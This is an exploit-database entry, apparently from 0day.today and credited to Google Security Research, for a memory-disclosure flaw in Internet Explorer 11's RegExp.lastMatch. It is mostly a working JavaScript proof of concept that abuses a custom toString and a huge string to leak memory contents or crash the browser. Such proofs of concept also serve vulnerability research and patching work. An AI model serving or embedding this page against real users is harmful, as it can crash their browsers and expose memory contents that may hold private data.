zdt | Google Security Research | 1337DAY-ID-30030
Mar 20, 2018 - 12:00 a.m.

Internet Explorer - RegExp.lastMatch Memory Disclosure Exploit

EPSS: 0.946 (percentile: 99.3%)

Exploit for the Windows platform in category dos / poc

/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.
 
This was tested on IE11 running on Windows 7 64-bit with the latest patches applied.
 
PoC:
 
=========================================
*/
 
<!-- saved from url=(0014)about:internet -->
<script>
 
function main() {
  RegExp.input = {toString: f};
  alert(RegExp.lastMatch);
}
 
var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");
 
function f() {
  String.prototype.match.call(input, "bbbbbbbbbb");
}
 
main();
 
</script>
 
/*
=========================================
 
Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed
*/

#  0day.today [2018-04-06]  #